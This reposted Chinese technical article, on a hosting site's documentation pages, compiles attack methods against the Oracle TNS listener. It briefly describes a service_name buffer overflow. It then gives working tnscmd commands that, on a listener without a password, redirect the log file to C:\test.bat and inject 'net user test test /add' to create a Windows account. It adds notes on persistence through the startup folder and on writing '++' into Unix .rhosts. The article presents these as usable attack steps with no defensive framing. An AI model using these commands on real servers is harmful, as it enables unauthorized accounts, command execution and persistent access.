网站首页
JSP空间
动态资讯
开源项目
技术文档
资源下载
J2EE资源
客户论坛
在线支付
 
  技术文档>>数据库技术>>Oracle技术>>Oracle开发>查看文档  
  针对oracle的tns listener攻击方法整理     
  文章作者:未知  文章来源:赛迪网技术社区  
  查看:35次  录入:管理员--2008-08-08  
 

【赛迪网-it技术报道】首先,根据版本的不同,tns listener可能较易受到多种类型的缓冲区溢出攻击,这些攻击可以在不提供用户id和口令的情况下被利用。例如:在oracle 9i中,当客户机请求某个过长的service_name时,很容易受到溢出攻击。当listener为日志构建错误消息之后,service_name的值会被复制到某于栈结构的缓冲区内,从而引起溢出—覆盖保存值将返回栈中的地址。这种做法可以使攻击者获得控制权。事实上,tns listener曾经有过多次溢出和格式化字符串的漏洞。

其次,另一类攻击和日志文件有关。只有当未给listener设置口令的时候,攻击才会有效。

假设某个listener没有设置口令,攻击方法如下:

tnscmd -h www.example.com -p 1521 ?rawcmd “(description=(connect_data=(cid=(program=)(host=)(user=))(command=log_directory)(arguments=4)(service=listener)(version=1)(value=c:\\)))” 将日志目录设置到c盘

tnscmd -h www.example.com -p 1521 ?rawcmd “(description=(connect_data=(cid=(program=)(host=)(user=))(command=log_file)(arguments=4)(service=listener)(version=1)(value=test.bat)))” 将日志文件设置为test.bat

tnscmd -h www.example.com ?rawcmd “(connect_data=(( ||dir >test.txt||net user test test /add))”该命令把

dir >test.txt、net user test test /add命令写入c:\test.bat文件,由于双竖线的作用(第一条命令执行失败后,windows命令解释器执行后面的命令)把错误的信息注释掉, 从而可以执行我们提交的命令。

通过设置日志文件到不同的目录,例如windows的启动目录,当服务器重启将执行恶意用户提交的特定代码,从而对系统造成威胁。

运行于unix系统上的oracle也会受到同样的威胁。其中一种方法就是将“++”回送给.rhost文件,当系统运行时,使用r*services命令。

 
 
上一篇: oracle ebs 11.5 for linux as4安装心得    下一篇: 个人经验总结:oracle 10g手工创建数据库
  相关文档
简单介绍Oracle数据库去除别名的方法 05-13
详细讲解各种数据库使用jdbc连接的方式 03-28
做了archive后如何收缩oracle的数据文件 02-28
详细讲解oracle i/o子系统的配置和设计 (1) 04-30
oracle数据库中的共享服务器和专用服务器 01-30
用最简单的方法复制或迁移oracle数据库 05-13
菜鸟学Oracle - 用PL/SQL画直方图 05-27
带你深入了解oracle跟踪事件:set events 07-24
轻松掌握oracle数据库where条件执行顺序 04-21
轻松掌握oracle数据库开发中序列的使用 08-05
把非归档模式的Oracle数据改成归档模式 09-29
Oracle中用SQL语句实现进制间互相转换 07-07
数据库应用系统的开发具体分为哪几个阶段 (1) 03-04
教你在Oracle中实现数据自动导入导出 04-12
oracle数据库exp imp按用户导出导入实例 (1) 03-31
在不安装oracle客户端的情况下进行系统移植 07-18
深入讲解memory_target与自动内存管理 03-24
oracle 9i sys_context函数的使用方法 07-04
有关Oracle数据库中并行处理技术剖析 04-11
带你深入了解如何根据数据库时间戳选择列 04-22
返回首页 | 关于我们 | J网章程 | JSP空间合租 | 客服中心 | 免责声明 | 常见问题 | 参观机房
本站主机空间代理至厦门市华众网络科技有限公司
《中华人民共和国增值电信业务经营许可证》
编号:闽B2-20050079
@2005-2008福建JSP技术网 版权所有 闽ICP备05000928号
厦门(总部):13616026886 福州:0591-87655121
邮箱:admin@fjjsp.com 站长QQ,点击这里给我发消息